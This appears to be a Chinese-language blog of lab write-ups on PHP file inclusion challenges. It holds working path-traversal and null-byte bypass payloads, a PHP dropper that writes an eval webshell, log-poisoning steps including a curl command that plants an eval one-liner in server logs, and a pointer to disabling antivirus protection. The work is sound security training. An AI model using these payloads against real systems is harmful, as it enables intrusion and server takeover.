<p>用00截断去截取 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTMvP2ZpbGU9Li4vLi4vcGhwaW5mby5waHAlMDAlRUYlQkMlOEMlRTYlOEElQTUlRTklOTQlOTklRTYlOEYlOTAlRTclQTQlQkElRTYlQjIlQTElRTYlOUMlODklRTQlQkElODYlRUYlQkMlOEMlRTQlQkQlODYlRTYlOTglQUYlRTglQkYlOTglRTYlOTglQUYlRTYlQjIlQTElRTYlOUMlODklRTYlOTglQkUlRTclQTQlQkFwaHBpbmZvJUU3JTlBJTg0JUU0JUJGJUExJUU2JTgxJUFG">http://127.0.0.1/lfi/LFI-3/?file=../../phpinfo.php%00，报错提示没有了，但是还是没有显示phpinfo的信息</span></p>
<ul>
<li>查看过滤的源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span> (substr($_GET[<span class="string">&#x27;file&#x27;</span>], <span class="number">-4</span>, <span class="number">4</span>) != <span class="string">&#x27;.php&#x27;</span>)</span><br><span class="line"> <span class="keyword">echo</span> file_get_contents($_GET[<span class="string">&#x27;file&#x27;</span>]);</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">&#x27;You are not allowed to see source files!&#x27;</span>.<span class="string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>substr函数，截取字符串，格式：substr(string,start,length)</p>
<p>eee.txt</p>
<p><em>start</em> 必需。规定在字符串的何处开始。正数 - 在字符串的指定位置开始，负数-在从字符串结尾开始的指定位置开始，0- 在字符串中的第一个字符处开始。</p>
<p>length 可选。规定被返回字符串的长度。默认是直到字符串的结尾。正数 - 从 <em>start</em> 参数所在的位置返回的长度，负数- 从字符串末端返回的长度</p>
<p>代码的含义：从结尾的倒数第四个开始，取4个长度。如../../a.php，取得的就是.php。即需要使得file的扩展名不为php。</p>
<p><code>file_get_contents</code> 这个函数用于获取文件中的一些内容，页面是不回显的，要在源码中查看内容。</p>
<ul>
<li>绕过方法：在末尾添加.或**/.**</li>
</ul>
<p><span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTMvP2ZpbGU9Li4vLi4vcGhwaW5mby5waHA=">http://127.0.0.1/lfi/LFI-3/?file=../../phpinfo.php</span>.  F12查看源码 最后有了phpinfo</p>
<p><span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTMvP2ZpbGU9Li4vLi4vcGhwaW5mby5waHA=">http://127.0.0.1/lfi/LFI-3/?file=../../phpinfo.php</span> (不加点) 最后没有phpinfo</p>
<p>实际上00截断也是可以的，F12查看源码</p>
<p>添加/.  ，查看，</p>
<p>[题目X]</p>
<p>来源—LFI-4</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTQv">http://127.0.0.1/lfi/LFI-4/</span></p>
<p>目标：查看敏感信息</p>
<p><strong>wp</strong></p>
<ul>
<li>查看源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;includes/class_&#x27;</span>.addslashes($_GET[<span class="string">&#x27;class&#x27;</span>]).<span class="string">&#x27;.php&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>其中addslashes函数，用法：返回在(预定义字符)之前添加反斜杠 的字符串。</p>
<p>预定义字符是：单引号‘ 双引号“ 反斜杠\ NULL</p>
<p>该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。</p>
<p><span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTQvP2NsYXNzPS4uLy4uLy4uLy4uLy4uL3BocGluZm8=">http://127.0.0.1/lfi/LFI-4/?class=../../../../../phpinfo</span></p>
<p>includes —&gt;class_ —&gt;class变量 —&gt; xxx.php 所以一共有5个../，这个也可以尝试出来</p>
<p>[题目X]</p>
<p>来源—LFI-5</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTUv">http://127.0.0.1/lfi/LFI-5/</span></p>
<p>目标：查看敏感信息/获取webshell</p>
<p><strong>wp</strong></p>
<ul>
<li>查看源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=<span class="string">&quot;/LFI-5/index.php&quot;</span> method=<span class="string">&quot;GET&quot;</span>&gt;</span><br><span class="line">    &lt;input type=<span class="string">&quot;text&quot;</span> name=<span class="string">&quot;file&quot;</span>&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">   $file = str_replace(<span class="string">&#x27;../&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $_GET[<span class="string">&#x27;file&#x27;</span>]);</span><br><span class="line">   <span class="keyword">if</span>(<span class="keyword">isset</span>($file))</span><br><span class="line">   &#123;</span><br><span class="line">       <span class="keyword">include</span>(<span class="string">&quot;pages/<span class="subst">$file</span>&quot;</span>);</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="keyword">else</span></span><br><span class="line">   &#123;</span><br><span class="line">       <span class="keyword">include</span>(<span class="string">&quot;index.php&quot;</span>);</span><br><span class="line">   &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<ul>
<li>先尝试 ?file=C://phpStudy/SoftwareDescription.INI，不成功。 </li>
</ul>
<p>尝试相对路径，<span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTUvP2ZpbGU9Li4vLi4vcGhwaW5mby5waHAlRUYlQkMlOEMlRTQlQkIlOEQlRTclODQlQjYlRTQlQjglOEQlRTYlODglOTAlRTUlOEElOUYlRTMlODAlODI=">http://127.0.0.1/lfi/LFI-5/?file=../../phpinfo.php，仍然不成功。</span></p>
<ul>
<li><p>查看源码，是把../替换为空了。</p>
<p>str_replace函数</p>
</li>
<li><p>双写../，即再两个点之间再加入../，../ —&gt; …/./ </p>
</li>
</ul>
<p><span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTUvP2ZpbGU9Li4uLy4vLi4uLy4vLi4uLy4vcGhwaW5mby5waHA=">http://127.0.0.1/lfi/LFI-5/?file=..././..././..././phpinfo.php</span> (这里查看代码可以看到，pages/多了一层目录，所以使用三个…/./)</p>
<ul>
<li>包含webshell.php</li>
</ul>
<p>蚁剑连接</p>
<p>[题目X]</p>
<p>来源—LFI-6</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTYv">http://127.0.0.1/lfi/LFI-6/</span></p>
<p>目标：查看敏感信息/获取webshell</p>
<ul>
<li>查看源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>($_POST[<span class="string">&quot;page&quot;</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>POST请求，实验1是GET请求。</p>
<p>参数是pages</p>
<ul>
<li>打开hackbar，答案：点击post data，page=../../phpinfo.php</li>
</ul>
<p>url里面只能发送GET参数。(提示url必须以/结尾)</p>
<p>先尝试使用绝对路径 page=C://phpStudy/SoftwareDescription.INI</p>
<p>输入page=../../phpinfo.php，成功执行phpinfo文件。</p>
<ul>
<li>也可以用burpsuite抓包 ❌ 这个不知道为啥不行，就先不演示了</li>
</ul>
<p>chrome演示，配合bp</p>
<ul>
<li>获取webshell</li>
</ul>
<p>POST请求无法直接获取webshell，需要再加工一下。</p>
<p>首先通过上传或者上传日志的方式，将一句话木马上传到服务器。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> fputs(fopen(<span class="string">&#x27;shell.php&#x27;</span>,<span class="string">&#x27;w&#x27;</span>),<span class="string">&#x27;&lt;?php eval($_POST[ah])?&gt;&#x27;</span>); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>首先使用fputs创建一个shell.php，fopen打开一个shell.php，打开方式为w，write写。要写的内容是第二个参数，就是一句话木马文件。</p>
<p>当请求这个php文件时，就会在当前目录下创建一个shell.php，内容就是后面的一句话木马。</p>
<p>假设在根目录先上传一个图像，image.txt，然后写内容，再改成jpg。</p>
<p>(写木马的时候，如果被计算机检测到并且删除，参考 <span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0E4NzMwNTQyNjcvYXJ0aWNsZS9kZXRhaWxzLzEwMDAzNzY5NQ==">https://blog.csdn.net/A873054267/article/details/100037695</span> 关闭实时保护)</p>
<p>先去包含image.jpg，完成之后会在当前的目录之下生成一个shell.php，没有报错。打开文件夹发现确实有这个文件。</p>
<p>用蚁剑去连接，蚁剑放在win10文件夹中。就获取了webshell。</p>
<p>[题目X]</p>
<p>来源—LFI-7</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTcv">http://127.0.0.1/lfi/LFI-7/</span></p>
<p>目标：查看敏感信息/获取webshell</p>
<p><strong>wp</strong></p>
<ul>
<li>查看源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=<span class="string">&quot;/LFI-7/index.php&quot;</span> method=<span class="string">&quot;POST&quot;</span>&gt;</span><br><span class="line">    &lt;input type=<span class="string">&quot;text&quot;</span> name=<span class="string">&quot;library&quot;</span>&gt;</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<p>方法是POST，传的参数是library。</p>
<p>post传参 library=../../phpinfo.php，没有回显。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;includes/&quot;</span>.$_POST[<span class="string">&#x27;library&#x27;</span>].<span class="string">&quot;.php&quot;</span>); </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>查看代码，发现他给加了.php，并且文件的层数多了一层</p>
<p>hackbar</p>
<p>(1) library=../../../phpinfo ，成功</p>
<p>(2)library=../../../phpinfo.php%00</p>
<p>bp抓包 ❌</p>
<p>不知道为什么抓包不行</p>
<p>考点：post+00截断</p>
<p>[题目X]</p>
<p>来源—LFI-8</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTgv">http://127.0.0.1/lfi/LFI-8/</span></p>
<p>目标：查看敏感信息/获取webshell</p>
<p><strong>wp</strong></p>
<ul>
<li>查看源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=<span class="string">&quot;/LFI-8/index.php&quot;</span> method=<span class="string">&quot;POST&quot;</span>&gt;</span><br><span class="line">    &lt;input type=<span class="string">&quot;text&quot;</span> name=<span class="string">&quot;file&quot;</span>&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span> (substr($_POST[<span class="string">&#x27;file&#x27;</span>], <span class="number">-4</span>, <span class="number">4</span>) != <span class="string">&#x27;.php&#x27;</span>)</span><br><span class="line"> <span class="keyword">echo</span> file_get_contents($_POST[<span class="string">&#x27;file&#x27;</span>]);</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">&#x27;You are not allowed to see source files!&#x27;</span>.<span class="string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<ul>
<li>考点：不能是php类型的</li>
</ul>
<p>file=../../phpinfo.php%00</p>
<p>file=../../phpinfo.php/.</p>
<p>❌ 不知道为什么未执行成功。</p>
<p>LFI8-10均未执行，留给学员测试。</p>
<p>[题目X]</p>
<p>来源—LFI-11</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTExLw==">http://127.0.0.1/lfi/LFI-11/</span></p>
<p>目标：查看敏感信息/获取webshell</p>
<ul>
<li>查看源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;form action=<span class="string">&quot;/LFI-11/index.php&quot;</span> method=<span class="string">&quot;POST&quot;</span>&gt;</span><br><span class="line">    &lt;input type=<span class="string">&quot;text&quot;</span> name=<span class="string">&quot;file&quot;</span>&gt;</span><br><span class="line">    &lt;input type=<span class="string">&quot;hidden&quot;</span> name=<span class="string">&quot;style&quot;</span> name=<span class="string">&quot;stylepath&quot;</span>&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">include</span>($_POST[<span class="string">&#x27;stylepath&#x27;</span>]); <span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>可以看到有两个参数，file和stylepath</p>
<p>input是隐藏的hidden，也就是在页面中是不显示的。</p>
<p>先尝试 file=../../phpinfo.php，不成功</p>
<p>stylepath=../../phpinfo.php</p>
<p>[题目X]</p>
<p>来源—LFI-12</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTEyLw==">http://127.0.0.1/lfi/LFI-12/</span></p>
<p>目标：查看敏感信息/获取webshell</p>
<p><strong>wp</strong></p>
<ul>
<li>查看源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=<span class="string">&quot;/LFI-12/index.php&quot;</span> method=<span class="string">&quot;GET&quot;</span>&gt;</span><br><span class="line">    &lt;input type=<span class="string">&quot;text&quot;</span> name=<span class="string">&quot;file&quot;</span>&gt;</span><br><span class="line">    &lt;input type=<span class="string">&quot;hidden&quot;</span> name=<span class="string">&quot;style&quot;</span> name=<span class="string">&quot;stylepath&quot;</span>&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">include</span>($_GET[<span class="string">&#x27;stylepath&#x27;</span>]); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>?stylepath=../../phpinfo.php</p>
<p>总：<span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTEyLz9zdHlsZXBhdGg9Li4vLi4vcGhwaW5mby5waHA=">http://127.0.0.1/lfi/LFI-12/?stylepath=../../phpinfo.php</span></p>
<p>考察：GET方法，隐藏的输入框</p>
<p>[题目X]</p>
<p>来源—LFI-13</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTEzLw==">http://127.0.0.1/lfi/LFI-13/</span></p>
<p>目标：查看敏感信息/获取webshell</p>
<p><strong>wp</strong></p>
<p>get方法，file=…/./…/./…/./phpinfo.php</p>
<p>总 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTEzLz9maWxlPS4uLi8uLy4uLi8uLy4uLi8uL3BocGluZm8ucGhw">http://127.0.0.1/lfi/LFI-13/?file=..././..././..././phpinfo.php</span></p>
<p>[题目X]</p>
<p>来源—LFI-14</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTE0Lw==">http://127.0.0.1/lfi/LFI-14/</span></p>
<p>目标：查看敏感信息/获取webshell</p>
<p><strong>wp</strong></p>
<ul>
<li>查看源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;form action=<span class="string">&quot;/LFI-14/index.php&quot;</span> method=<span class="string">&quot;POST&quot;</span>&gt;</span><br><span class="line">    &lt;input type=<span class="string">&quot;text&quot;</span> name=<span class="string">&quot;file&quot;</span>&gt;</span><br><span class="line">    &lt;input type=<span class="string">&quot;hidden&quot;</span> name=<span class="string">&quot;style&quot;</span> name=<span class="string">&quot;stylepath&quot;</span>&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">   $file = str_replace(<span class="string">&#x27;../&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $_POST[<span class="string">&#x27;file&#x27;</span>]);</span><br><span class="line">   <span class="keyword">if</span>(<span class="keyword">isset</span>($file))</span><br><span class="line">   &#123;</span><br><span class="line">       <span class="keyword">include</span>(<span class="string">&quot;pages/<span class="subst">$file</span>&quot;</span>);</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="keyword">else</span></span><br><span class="line">   &#123;</span><br><span class="line">       <span class="keyword">include</span>(<span class="string">&quot;index.php&quot;</span>);</span><br><span class="line">   &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<p>post方法</p>
<p>file=…/./…/./…/./phpinfo.php</p>
<h2 id="⌛️远程文件包含漏洞"><a href="#⌛️远程文件包含漏洞" class="headerlink" title="⌛️远程文件包含漏洞"></a>⌛️远程文件包含漏洞</h2><p>定义：能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可以控制的，此漏洞一旦存在，危害性会很大。由于危害性很大，所以一般都是没有的。</p>
<p>条件：利用条件较为苛刻，需要在远程服务器的php.ini中配置如下信息</p>
<p>allow_url_fopen=On，能够读取远程文件<br>allow_url_include=On，可以使用include和require等方式包含远程文件，为0ff时，只能包含本地文件</p>
<p>具体的配置过程如下：</p>
<ul>
<li><p>php -v 可以查看php的版本信息</p>
</li>
<li><p>php.ini 的位置查找：<code>php -i | grep php.ini</code>，结果是位于 /etc/php/5.6/cli/php.ini 参考 <span class="exturl" data-url="aHR0cHM6Ly93d3cuamlhbnNodS5jb20vcC9jODdiZTIwZjE0Mzc=">https://www.jianshu.com/p/c87be20f1437</span></p>
</li>
</ul>
<p>打开文件，shift + ⬇️，翻页找到两个allow，都更改为On。</p>
<p>[题目1]</p>
<p>来源：dvwa-file inclusion- low</p>
<p><strong>wp</strong></p>
<ul>
<li>配置好服务器的php.ini文件后，在服务器中新建文件ah3.txt，文件内容如下，文件的地址为<code>/root/course/fi</code></li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">phpinfo();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<p>⌛️ 待补充….</p>
<h1 id="0x02包含日志文件获取webshell"><a href="#0x02包含日志文件获取webshell" class="headerlink" title="0x02包含日志文件获取webshell"></a>0x02包含日志文件获取webshell</h1><h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><p>​        </p>
<h3 id="利用场景"><a href="#利用场景" class="headerlink" title="利用场景"></a>利用场景</h3><p>​        当我们没有上传点(不能文件上传)，并且也没有url_allow_include功能时(不能远程包含)，我们就可以考虑包<strong>含服务器的日志文件。</strong> </p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><pre><code>   利用思路也比较简单，当我们访问网站时，服务器的日志中都会记录我们的行为，当我们访问链接中包含PHP一句话木马时，也会被记录到日志中。从另一角度来看，这个一句话木马就被写入到了服务器中。</code></pre>
<p>​        这时候我们如果知道服务器的日志位置，我们可以去包含这个文件从而拿到shell。其实整个“包含日志文件漏洞利用”最关键的就是找日志存放的“物理路径”，只要找到日志的物理存放路径，一切就可以按部就班的完成利用了。 </p>
<h3 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h3><ul>
<li><p>有文件包含漏洞</p>
</li>
<li><p>知道日志的物理存放路径</p>
</li>
<li><p>curl命令行url请求工具 或者 burpsuit代理；（避免url转码的存在）</p>
</li>
</ul>
<h2 id="获取日志存放路径"><a href="#获取日志存放路径" class="headerlink" title="获取日志存放路径"></a>获取日志存放路径</h2><h3 id="默认路径"><a href="#默认路径" class="headerlink" title="默认路径"></a>默认路径</h3><p>(1) apache+Linux日志默认路径</p>
<p><code>/etc/httpd/logs/access_log</code> 或 <code>/var/log/httpd/access_log</code></p>
<p>(2) apache+win2003日志默认路径</p>
<p><code>D:\xampp\apache\logs\access.log</code></p>
<p><code>D:\xampp\apache\logs\error.log</code></p>
<p>如果安装的是phpstudy，路径是C:\phpStudy\PHPTutorial\Apache\logs</p>
<p>(3)IIS6.0+win2003默认日志文件</p>
<p><code>C:\WINDOWS\system32\Logfiles</code></p>
<p>(4)IIS7.0+win2003 默认日志文件</p>
<p> <code>%SystemDrive%\inetpub\logs\LogFiles</code></p>
<p>(5)nginx 日志文件</p>
<p>日志文件在用户安装目录logs目录下,例如安装路径为 /usr/local/nginx, 那么日志文件就是在/usr/local/nginx/logs里</p>
<h3 id="web中间件默认配置"><a href="#web中间件默认配置" class="headerlink" title="web中间件默认配置"></a><strong>web中间件默认配置</strong></h3><p>(1) apache+linux 默认配置文件</p>
<p>​    /etc/httpd/conf/httpd.conf</p>
<p>或者</p>
<p>​     index.php?page=/etc/init.d/httpd</p>
<p>(2) IIS6.0+win2003 配置文件</p>
<p>​    C:/Windows/system32/inetsrv/metabase.xml</p>
<p>(3) IIS7.0+WIN 配置文件</p>
<p>​    C:\Windows\System32\inetsrv\config\applicationHost.config</p>
<p>[题目X]</p>
<p>来源—LFI-1</p>
<p>地址 <span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTEv">http://127.0.0.1/lfi/LFI-1/</span></p>
<p>目标：查看敏感信息/获取webshell</p>
<p>找到自己Windows中的日志文件路径</p>
<p>C:\phpStudy\PHPTutorial\Apache\logs中没有access.log，打开配置文件C:\phpStudy\PHPTutorial\Apache\conf\extra中的httpd-vhosts.conf</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">#&lt;VirtualHost *:80&gt;</span><br><span class="line">#    ServerAdmin webmaster@dummy-host2.example.com</span><br><span class="line">#    DocumentRoot &quot;&#x2F;Apache24&#x2F;docs&#x2F;dummy-host2.example.com&quot;</span><br><span class="line">#    ServerName dummy-host2.example.com</span><br><span class="line">#    ErrorLog &quot;logs&#x2F;dummy-host2.example.com-error.log&quot;</span><br><span class="line">#    CustomLog &quot;logs&#x2F;dummy-host2.example.com-access.log&quot; common</span><br><span class="line">#&lt;&#x2F;VirtualHost&gt;</span><br></pre></td></tr></table></figure>



<p><span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTEvP3BhZ2U9QzolNUNwaHBTdHVkeSU1Q1BIUFR1dG9yaWFsJTVDQXBhY2hlJTVDbG9ncyU1Q2Vycm9yLmxvZw==">http://127.0.0.1/lfi/LFI-1/?page=C:\phpStudy\PHPTutorial\Apache\logs\error.log</span> </p>
<p>可以访问错误日志文件。</p>
<p><span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTEvP3BhZ2U9QzolNUNwaHBTdHVkeSU1Q1BIUFR1dG9yaWFsJTVDQXBhY2hlJTVDbG9ncyU1Q2FjY2Vzcy5sb2c=">http://127.0.0.1/lfi/LFI-1/?page=C:\phpStudy\PHPTutorial\Apache\logs\access.log</span></p>
<p>可以访问日志文件</p>
<p>获取webshell：</p>
<p>我们在进行访问的时候，url是直接记录在日志文件中的。</p>
<p>如果执行<code>&lt;?php phpinfo(); ?&gt;</code>发现就被写在phpinfo中去了。</p>
<p>[解决错误]由于没找到access.log，暂时用error.log代替。(这个原因是没有打开日志)</p>
<p>参考 <span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80ODQ3NDE4OC9hcnRpY2xlL2RldGFpbHMvMTA3MTQ5MzU0JUVGJUJDJThDJUU2JTg5JTkzJUU1JUJDJTgwJUU2JTk3JUE1JUU1JUJGJTk3JUU2JTk2JTg3JUU0JUJCJUI2">https://blog.csdn.net/weixin_48474188/article/details/107149354，打开日志文件</span></p>
<p> 利用文件包含漏洞直接访问“服务日志文件”，但是发现并没有对构造的php进行正常解析，因为后台已经把特殊字符进行了url编码，比如&lt; ? 空格，都会被浏览器默认执行url编码，记录日志的时候也是记录的经过url编码的内容。</p>
<p>再来分析一下一句话写入日志文件的利用过程，我们利用浏览器构造一个请求，这个请求会被记录到日志文件，但是写入日志文件的过程中发生了字符转码。</p>
<?php phpinfo(); ?><p> 被转义成了</p>
<p>%3C?php%20phpinfo();%20?%3E</p>
<p>&lt; — %3C  </p>
<p>&gt; — %3E </p>
<p>空格 — %20</p>
<p>这里可以百度搜索‘url编码’，进行演示。</p>
<p>总结失败原因：浏览器直接构造的PHP一句话中特殊字符，会被浏览器自动进行URL转义，导致最终写入日志文件中的而这些转码后的编码PHP并不能进行正常的解析。</p>
<p><strong>解决方法1：bp抓包,第一行url中后面写入phpinfo的代码</strong></p>
<p>这样就可以绕过后台的编码。查看access.log文件。</p>
<p><span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMS9sZmkvTEZJLTEvP3BhZ2U9QzolNUNwaHBTdHVkeSU1Q1BIUFR1dG9yaWFsJTVDQXBhY2hlJTVDbG9ncyU1Q2FjY2Vzcy5sb2c=">http://127.0.0.1/lfi/LFI-1/?page=C:\phpStudy\PHPTutorial\Apache\logs\access.log</span> </p>
<p>成功执行了。</p>
<p>如果phpinfo改成一句话木马 <?php eval($_POST[ah]); ?> ，再打开日志文件，就发现有了一句话木马文件。</p>
<p>用蚁剑连接，就可以获取webshell。</p>
<p>也可以用相对路径</p>
<p><strong>解决方法2: curl构造一句话，写入日志文件记录</strong></p>
<p>介绍一下curl，它是一个常用的命令行工具，用来请求 Web 服务器。它的名字就是客户端（client）的 URL 工具的意思。</p>
<p>他的用法很多，具体需要使用的时候可以用语句curl –help 查看帮助文档。</p>
<p><code>-v</code>参数输出通信的整个过程，用于调试。</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -v &quot;http://10.211.55.3/lfi/LFI-1/?page=&lt;?php @eval($_POST\[123\]);?&gt;&quot;</span><br></pre></td></tr></table></figure>

<p>查看日志文件，确实成功写入了。为了和bp区分，这里用的密码是123。成功的原因：curl在请求资源的时候，没有像浏览器一样对特殊字符进行url的转码，而是原封不动的将php一句话 信息写入了服务日志文件中。</p>
<p><span class="exturl" data-url="aHR0cDovLzEwLjIxMS41NS4zL2xmaS9MRkktMS8/cGFnZT1DOiU1Q3BocFN0dWR5JTVDUEhQVHV0b3JpYWwlNUNBcGFjaGUlNUNsb2dzJTVDYWNjZXNzLmxvZw==">http://10.211.55.3/lfi/LFI-1/?page=C:\phpStudy\PHPTutorial\Apache\logs\access.log</span></p>
<p>随后用蚁剑去进行连接。</p>
<p> curl构造一句话时，需要注意两点：</p>
<p>1）请求的资源对象，需要被双引号包含，不然会报错；<br>2） php一句话中的 中括号[ ]curl是特殊符号，需要进行转义\ [\ ]，不然curl使用时也会报错；</p>
<p>尝试一下这两个错误。</p>
<p>LFI参考文章一览 <span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3UwMTE3ODUzMDkvYXJ0aWNsZS9kZXRhaWxzLzEwNTE4MTY1Ng==">https://blog.csdn.net/u011785309/article/details/105181656</span></p>
